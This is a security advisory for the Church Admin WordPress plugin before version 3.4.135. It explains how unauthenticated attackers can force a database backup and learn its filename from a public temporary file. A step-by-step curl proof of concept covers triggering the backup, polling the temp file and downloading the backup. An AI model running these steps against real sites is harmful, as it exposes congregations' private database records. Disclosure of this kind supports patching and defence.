Church Admin < 3.4.135 - Unauthenticated Plugin's Backup Disclosure

The plugin does not have authorisation and CSRF in some of its action as well as requested files, allowing unauthenticated attackers to repeatedly request the “refresh-backup” action, and simultaneously keep requesting a publicly accessible temporary file generated by the plugin in order to disclose the final backup filename, which can then be fetched by the attacker to download the backup of the plugin’s DB data

PoC

1. In one terminal, continuously fetch from http://127.0.0.1:8080/?action=refresh-backup: while true; do curl -s ‘http://127.0.0.1:8080/?action=refresh-backup’ >/dev/null; done 2. In a second terminal, continuously fetch from /wp-content/uploads/church-admin-cache/temp.sql while true; do curl -s http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/temp.sql | grep ‘\.sql\.gz’; done 3. After a while, the backup filename should be found by the curl | grep command (second terminal), once found, abort the command in terminal one first, then the one in the second terminal - use the last output of the second terminal as the filename (.sql.gz). 4. Download the backup by accessing it via http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/.sql.gz